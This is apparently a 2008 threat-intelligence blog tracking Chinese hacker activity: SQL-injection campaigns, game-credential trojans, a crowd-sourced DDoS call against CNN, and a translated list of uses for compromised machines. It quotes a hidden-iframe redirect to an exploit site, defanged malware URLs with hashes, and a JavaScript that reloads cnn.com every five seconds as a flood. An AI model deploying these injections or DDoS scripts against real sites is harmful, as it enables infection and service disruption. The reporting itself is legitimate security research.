The Dark Visitor

Trojan Horse

So the Analyt’s Diary blog at viruslist.com has an article on some new mass SQL injection attack that jacks up .asp pages with redirects to browser exploits. The exploits drop one of two trojans that steal passwords and whatnot. Here is h.js:

document.write(”");
document.write(”");

Wordpress won’t display the script. Basically, it loads an iframe that points to two separate URLS (these URLs contain browser exploits so don’t follow them):

hxxp://vvexe.com/haha/index.html and
hxxp://www.kenya.com/faq.htm

I can’t seem to get to either of these sites at the moment. I’ll try again later.

Update:  I spent some time looking at this malware.  The two pages listed earlier in this post contain iframes to browser plug-in exploits for real player and other typical vulnerabilities.  The exploits attempt to load and run down.exe (e160f590d894a98474697ac0db987746 not packed/delphi code) which in turn downloads hxxp://www.vvexe.com/haha/down.txt to get the additional files 1.exe (a7fc8c966fdeb550fe19aba3169569be not packed/VC++), do.exe (5af5edaa2cebf1fed56ad36799b2c850 ) and cool.exe (18867d6de1a3a9241c14c22c19b51351 not packed/delphi).

1.exe is a WoW trojan and waits for passwords sent to:

grunt.wowchina.com and [kr|us|tw|eu].[version|logon].worldofwarcraft.com.  It also looks for and attempts to disable many types of security software.  It attempts to send the stolen credentials to an asp on www.yilu777.com.

do.exe is a little more interesting.  It appears to be a generic remote access trojan that sends a beacon to qq number 58836533.  A quick search for that qq number revealed that this person’s paipai account has been frozen:

So I do some more digging and find the QQ profile with a name and nick:

Searching for the nickname got me to a few blogs and profiles that had some young girl who is really into anime. Maybe her QQ account got pwn3d or maybe, just maybe she is a member of “China Girl Security”. I tried to get an add on that QQ account so I could talk to the hacker but didn’t have any luck.

Note to Chinese hackers: Please pay the tax on your WoW gold profits.

Breaking news is that the International Space Station has been infected by the W32.Gammima.AG trojan. The trojan is also referred to as the kavo.exe virus and is designed to gather information on ten online games:

ZhengTu
Wanmi Shijie or Perfect World
Dekaron Siwan Mojie
HuangYi Online
Rexue Jianghu
ROHAN
Seal Online
Maple Story
R2 (Reign of Revolution)
Talesweaver

Not familiar with all the games but most are Chinese or Korean. Chinese hackers specialize in stealing online gaming information. Symantec also offers up this bit in its writeup:

The worm ends the Matrix Password process if it finds a dialog box with the following characteristics:
Title: MatrixPasswordDlg
Message: Warning! (In Chinese characters)

Will check more into the origin of this malware later today but all indicators suggest that it could be Chinese.

Hat-Tip: Benny

Oliver Day is guest posting over at Blogs.zdnet.com and has an interesting article on research into malware infections inside China. He discusses the data and the difficulty in making an accurate analysis of what that information means:

The percent of infections claiming to be from China are not an absolute measure and it is safe to assume that there are not only registrations originating from China claiming to be from other countries but also registrations from outside the country claiming to be Chinese. One of the general assumptions I’ve operated under is that the majority of the infections we see are not operated by those who profit from the infections.

Read more about infected Chinese sites here…

One thing that has always interested me is the types of targets Chinese hackers seek out for attack. Since it is impossible for us to protect everything, or be everywhere, understanding the most likely targets should be a high priority. Of course this is only part of a comprehensive cyber security program but knowing how your adversary thinks is one area we need to explore.

An article in pchome.net gave the five most desired websites Chinese hackers sought out in order to hang trojans. Trojans have been the tool of choice for Chinese hackers since their first indigenously produced program Glacier was introduced into the cyber conflict with Taiwan in 1999.

According to pchome.net, these were the preferred websites:

1)

Government websites

: Government sites are chosen due to low-level security and the lack of specially trained security personnel. They do not bring financial gain but have the potential to influence public opinion. This type of attack “challenges authority” and brings about personal satisfaction for the hacker. A successful attack on a government website provides the attacker with recognition and fame.

2)

Medium and Small-Scale company websites

: Similar to government websites due to the lack of security. While these types of attacks to not bring about fame for the hacker, they are very good practice for the novice.

3)

Community websites

: Huge number of visitors, even if the trojan is only around for a short period of time, it can result in a large number of infected visitors. Although the value of the individual users is not as great as a financial website, the collective of infected users can be used to create a botnet. Furthermore, this allows the hacker to steal virtual game assets and QQ (ICQ) money.

4)

Financial websites

: This type of website does not have a larger number of users but the average individual has a high net worth. If a hacker is able to install a trojan here, they can gain user account passwords, access bank accounts and control stock securities. Although this type of website has very high security, it is the most desirable.

5)

E-commerce sites

: These website share the benefits of both community and financial websites and are the most lucrative. Hackers are able to manipulate price, supply/demand and control the online transactions. Furthermore, they can use trusted user accounts to construct phishing “activities.” E-commerce website are the most favored for hackers to carry out phishing exploits.

Army lessons learned: First rule in the Army is never present a problem without a solution. Solution, hire people like Jumper who are experts in preventing these types of attacks.

People often ask me if I am worried about this website getting hacked or shutdown by Chinese hackers…I tell them no, I have an excellent firewall…called Jumper.

According to HC360.com, with the end of Chinese college entrance exams (高考) and the start of registration, parents and students need to protect their online information from hackers.  The warning explains that while the internet contains a lot of relevant information about registration, it also has risks.

Digital Security Laboratories (sucop.com) is reminding parents of the students taking the exams to increase their vigilance and prevent incidents with hackers before they occur.  They list several methods the hackers commonly use to get information from the students:

1) The underground hacker industrial chain uses information on the college entrance examination in order to disseminate trojans and viruses.  The article further explains that this element of the underground economy is already in place and fully developed.   People engaged in this type of activity are highly adept at using social engineering to manipulate large-scale events such as the Olympics, disasters, entrance exams…etc. They used the information collected from online users for their own financial benefit.

2)  The underground transaction website: Online registration is now very common and some websites publicly advertise that the can alter student records, household registration and achievements.  This is just a way to cheat parents and students out of their money.

3) Some phishing websites are even a greater danger:  The hackers use these phishing websites to post false information and disrupt the registration process of the college.  They also solicit enrollment expenses from the students that do not exist.  Furthermore, they also use the site, combined with the methods mentioned above to get the student information to resell.  Hacker have also used loopholes in the college registration sites to blackmailed students by tampering with the data they entered on the online form.

New Chinese hacker program making the rounds called Chinese Vampire v2.2.1 (starving anti-virus) billed as a trojan downloader tool, ARP attack, QQ tail…etc. The screenshot below shows the downloader interface:

From what I have read about the tool, it is very effective. So effective in fact, that another Chinese hacker calling himself Sadness, from the Black Wolf hacker group, stole it. Yes, he did. Look at the trackback URLs associated with this screenshot compared to the one above (circled in red). Notice that our thief has changed it to the Black Wolf website instead of the www.9u9u9.cn address.

The true author of Vampire v2.2.1 runs the website pictured below and calls himself SKSgod…sigh. He was really unhappy with the theft of his property and posted a pretty nasty response to Sadness. Yeah, hacker on hacker violence doesn’t concern me in the least.

Now the truly exciting part of this post, there is also a female hacker involved in the marketing of this fine product named Jiajia (佳佳). Hmmm, you say…that name sounds familiar? Well it should! It is the same name as one of the members of the Six Golden Flowers.

Jiajia of the Six Golden Flowers

Is the same Jiajia? I don’t think it is but not sure. On her blog, this Jiajia claims that due to the controversy over the stolen program, there are only two legitimate sites to download Vampire v2.2.1. One is her site and the other at SKSgod’s. Yes, there was a picture associated with Jiajia’s website:

Now this girl certainly doesn’t look like Jiajia number one and she appears to be a bit younger. Also, the characters next to the picture said “Sleepless Night.” Hell, this could be the picture off an album cover (and yes I did try to see if I could find a record called Sleepless Night) for all I know. She may just be the Brittany Spears of China. Thought I would include it anyway…sue me.

Dear Chinese hacker master,

Sadly, I have all these compromised computers just laying around the place and don’t know what do with them, could you please help?!?

- Confucius…sed amateur

Dear Confused,

No need to be embarrassed, we have all experienced this dilemma at one time or another. Let me offer a few simple solutions to this common problem:

1. Steal virtual property from the compromised computer. Take their game account ID, QQ number and Q money.
2. Steal real property from the compromised computer. Real property can consist of bank accounts or online stock speculator account numbers. There are many types of trojans designed specifically for getting the account numbers of online stock speculators.
3. Steal people’s private data. Remember, just like the Edison Chen photo scandal, regular people can be extorted too if you threaten to release their explicit photos on the internet. Use their private information that could be harmful to blackmail them. If you steal commercial data such as financial reports and personnel records it can be used for your illegal benefit. Also, you can attempt to control their webcam in order to fill the desires of peeping toms.
4. Use the victim’s connections to get illegal benefits. Perhaps you think your QQ number is insignificant, you don’t have QQ 秀 (unclear) or QQ money. Not so, your friends QQ numbers, your e-mail contacts and cellphone contacts are all targets for the attacker. The attacker can fake your identity to carry out all manner of illegal activity. Everyone’s personal connections have commercial worth. The most common example of this is the 12950 service that used groups of QQ numbers to send out trash/spam? information to steal money or the MSN virus that automatically sent out information to your friends to defraud them. NOTE: the 12590 service could refer to this: Optional service Game treasure box makes the mobile into a game machine. A mobile QQ can go anywhere, 12586 online entertainment (that has many strange old friends), 12590 interactive message service (that has various voice monsters), CRBT and MMS (that are full of fun, personalized ring tones and pictures that can be downloaded anytime)……your enjoyment with these features is endless!
5. Plant rogue software on the compromised computer. This will make it automatically click online advertising for profit. This can really effect your online experience as I suspect everyone hates online pop-up ads. After the attacker controls a lot of compromised computers, they can force out ads and obtain profits from the ad owners. The number one reason for rogue software flooding is that many companies purchase rogue software developers’ advertisements. Other attackers use the rear platform? to covertly click on advertisements in order to gain profits. This causes the ad owner to waste money through invalid clicks.
6. Use the compromised computer as a springboard (proxy server) to attack other computers. Any type of hacker attack can leave behind traces and in order to better conceal yourself, it is necessary to use many proxy jumps. The compromised computers can act as an agent and a scapegoat. The attacker can disseminate even more trojans and think of your computer as a downloading station. It is a possibility that network speed and performance will be improved with proxy servers.
7. The compromised computer is the foot soldier to launch DDOS attacks. DDOS attacks can earn money for internet gangs or cyberwarfare (those who engage in it) as some people will hire these internet goons who initiate conflicts. Internet gang members can carry out an attack directly against their target and then blackmail the victim. Compromised computers are a chess piece for internet gangs and DDOS attacks have become a poisonous cancer for the internet.

Yep, a little fun in the beginning with this post (I made it up)  but the rest is a real list of uses for compromised computers put out by Chinese hackers.

I swear I heard the sound of people flipping their webcams towards the ceiling after reading number 3.

UPDATE: Hat-Tip to Therese who sets me straight on the definition of QQ 秀:

QQ 秀 == QQ “Show”

It’s one of the things that you can spend QQB on. You purchase outfits and accessories to dress up your little avatar. It’s like putting on a show. Therese also provides a Flickr link to “patriotism QQ-Show.”

http://www.flickr.com/photos/keso/2421813915/

Benny from security4all.be sent Heike a link to an article at the Internet Storm Center that covers some patriotic mass SQL-Injection attacks.  The attacker appended this text to the bottom of every compromised index.htm file (this text was copied from the ISC and includes their edits):

“This is a mass invasion.        Safeguard the motherland’s dignity!
F*** FRANCE!  F*** CNN!  I WILL ATTACK you ALWAYS  !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276@163.com “

Another site that Paul from pauldotcom.com found and contributed to ISC includes obfuscated javascript that includes a function to evaluate if the web browser is configured for PRC/Mainland Chinese - zh-cn.  Anyone who doesn’t have zh-cn gets redirected to a site hosting browser exploits.  Cool.  here is the code snippet from the ISC:

if (navigator.systemLanguage==’zh-cn‘){}else{document.writeln(”<iframe
src=http://www.ririwow.cn/index.htm” width=100 height=0></iframe>”);}

This reminds me of the patriotic virus that Heike blogged about a while ago that only exploited machines configured for the traditional Chinese character set (most mainland Chinese use simplified).

Thanks for the heads-up Benny!

Danwei linked to this article indicating that the hackers responsible for compromising the Korean auction site several months ago have been arrested in the PRC.  The article goes on to describe some interesting details such as:

KBS also talked to Chinese hackers who claim there is something of a black market for Korean personal information in China. They say Koreans hire Chinese hackers to break into sites to get information, which is then handed over and sold in Korea.

There is also some limited information about a tool that was used to compromise the Korean sites.

UPDATE FIZZLE: Just got word from Jose that nothing happened with the CNN website today. Chinese hackers are starting to make me look bad and I will not stand for that!!
If this keeps up, it may be easier to list the days that Chinese hackers are not calling for an attack on CNN.

Had some serious reservations about posting this article for a couple of reasons but decided it is probably worthwhile. The cons are that there is ZERO confirmation from other sites about the impending attack and the alert posting did not list a sponsoring organization. On the pro side, it included a website that was setup on the 20th (after initial attack) that is linked in the post and looks like it is there to support the action.

So, large CAVEAT: UNCONFIRMED

Added bonus, stupid clock again:

The Announcement

At 8:00 pm (Beijing local) on 25 April, Chinese hackers will attack CNN

[Announcement] 2008-04-21 On 25 April, 8:00 pm (Beijing local), Chinese hackers will attack CNN.

Everyone, please pay attention to the issuses regarding the effort to invade the CNN website. We are requesting the support of all Chinese. If you are an expert hacker, we request you ardently strive to invade www.cnn.com. If you are a novice, we request you use DDOS flood attack or put up a couple of pieces of hacker software. If you are not a hacker, we request that you land on the www.cnn.com website at 8:00 pm on 25 April.

Try with all your might to establish a link with the website in order to waste its resources. If their website is continually at capacity for three hours, the server may just crash. Don’t forget, there are over 1.4 billion Chinese! There are over 100 million Chinese online, they won’t be able to withstand us.

Please, assist us with the invasion of www.cnn.com, this represents the honor of China over the issue of Tibetan independence. The www.cnn.com website has put out a large amount of unsubstantiated reports that are a serious challenge and US hackers have already invaded many of our websites. It is time for revenge; let us begin a new round of Sino-US hacker wars. Let them know the strength of the Chinese people.

If it is convenient, please circulate this message to all of your groups. We need support…. Currently, many of us are going to this webpage to carry out the attack, http://www.goupsoft.com.cn/Bs_Cnn.html. The first time you open it, it might not display. Just refresh the page and it should be okay.

Kinda Lazy (but genius!)

Over at the attack website of goupsoft.com, you land on an automated webpage that uses your computer and IP address to continuously “attack” the CNN website unless you close the browser. My guess is that it is constantly making fresh requests from CNN to tie up bandwidth. The graphic below even shows the number of attacks you have made on the site.

Yeah, I kinda attacked CNN 24 times…Whoops! Well, CNN never returned my e-mail either! Damn, I’m sort of a Chinese hacker now? Anyway, the only really interesting thing in that blurb of Chinese above is that they call CNN a “whore.” Really, twice.

This Attack Method Spreading

While this might be the oldest trick in the book, it is new to me so I’m putting it out there. The website http://www.chenmin.org/doscnn.html is using pretty much the exact same attack method as mentioned previously.

Once again, you land on the webpage above and it begins refreshing the CNN website in an iFrame every five seconds using up their bandwidth (Jumper explained this to me). So, I sort of attacked CNN another five,six, seven…forty times looking at the program. Here is Jumper’s full explanation from the question I e-mailed to him last night about the site:

Yes. It loads an iframe: And then it reloads itself every five seconds:

<script>

var e=document.getElementById(’cnn’);

setInterval(”e.src=’http://www.cnn.com‘”,5000);

//1000 表示1000毫秒,你可以修改并转发

</script> Probably not as effective as the Mao-inator program.

I direct your attention to the last line (emphasis mine) in Jumper’s e-mail. Number one, he dubs the program he analyzed yesterday as the Mao-inator™, which I personally find hilarious. Number two, there seems to be a slight amount of professional jealousy involved since he is dismissing my program as “less effective” than the one he worked with. Yeah, but did yours call CNN a “whore” didn’t think so! Less effective, I think not sir!

All kidding aside, this is an excellent method for incorporating large numbers of unskilled people into your DDoS attack. It comes with the added advantage of using their computers, IP addresses and bandwidth and you don’t have to train them. The only skill that is required is the ability to open a webpage in a browser and let it run. Plus, recruits who might not be so willing to stick around to the end of the fight, if tied to a computer all day, are free to do whatever they want while at the same time defending the motherland. My vote GENIUS!

Make up your own odds if this will actually take place. I have informed Jose Nazario at Arbor Networks who has been monitoring this situation closely and has had great insights.

UPDATE 1: Located the blog for Li Haiwei, the owner of the attack website goupsoft.com.cn, and my boy has some serious issues with CNN and Tibet. Lots of disturbing imagery for the whole family:

The graphic reads, “CNN- I like it. I am CNN.” Then some stuff way too small to read. The Nobel Peace Prize award you can read yourself and at the bottom Tibet.

UPDATE 2: Netcraft has a live performance monitor for the CNN webiste here.